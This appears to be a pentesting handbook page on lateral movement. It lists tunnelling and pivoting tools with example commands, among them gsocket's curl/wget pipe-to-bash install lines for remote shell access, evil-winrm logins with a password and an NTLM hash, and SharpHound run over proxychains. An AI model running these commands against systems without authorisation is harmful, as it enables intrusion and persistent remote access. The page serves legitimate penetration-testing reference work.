# Lateral Movement

[**Neo-reGeorg**](https://github.com/L-codes/Neo-reGeorg): The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

[**Tunna**](https://github.com/SECFORCE/Tunna):  Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.

[**pivotnacci**](https://github.com/blackarrowsec/pivotnacci)**:** Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server that communicates with HTTP `agents`. The architecture looks like the following:

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MYJfpYKwg7XOzVAS4gJ%2F-MYKe391DPjhNuDFPf3r%2Fimage.png?alt=media\&token=9bee3717-27d1-4941-b0d4-d2d1140171b1)

[**ngrok**](https://ngrok.com/): Spend more time programming. One command for an instant, secure URL to your localhost server through any NAT or firewall.

[**gsocket**](https://github.com/hackerschoice/gsocket)**:** The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.

Use either one of these two commands to *deploy*:

```
bash -c "$(curl -fsSL gsocket.io/x)"
bash -c "$(wget -qO- gsocket.io/x)"
```

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MZ91ivqpwG5buDAk1y4%2F-MZ9NPDjsl7MZ_phLOd_%2Fimage.png?alt=media\&token=b8852f55-040f-4629-b26f-fbdae591ecb0)

Use either one of these two commands to *uninstall*:

```
GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"
```

Access the remote host from anywhere in the world:

```
$ gs-netcat -s ExampleSecretChagneMe -i
```

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MZ91ivqpwG5buDAk1y4%2F-MZ9NRYvSTcsxKTESBHa%2Fimage.png?alt=media\&token=10c75dfc-ea7b-4ece-90b5-d347a4cd14b1)

{% embed url="<https://youtu.be/tmf9VGDPILE>" %}

{% embed url="<https://www.gsocket.io/deploy/>" %}

[**evil-winrm**](https://github.com/Hackplayers/evil-winrm)**:** This shell is the ultimate WinRM shell for hacking/pentesting.

```
ruby evil-winrm.rb -i 10.10.10.161 -u username -p passw0rd
ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
ruby evil-winrm.rb -i 10.10.10.149 -u 'DOMAIN\USER' -p 'passw0rd
```

**proxychains windows**

```
.\proxychains_win32_x64.exe -f .\proxychains.conf C:\Users\IEUser\Downloads\SharpHound.exe --collectionmethods All
```

{% embed url="<https://github.com/shunf4/proxychains-windows>" %}